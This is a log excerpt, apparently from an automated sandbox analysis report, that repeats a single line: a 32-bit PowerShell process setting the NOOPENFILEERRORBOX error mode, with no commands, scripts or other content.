                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
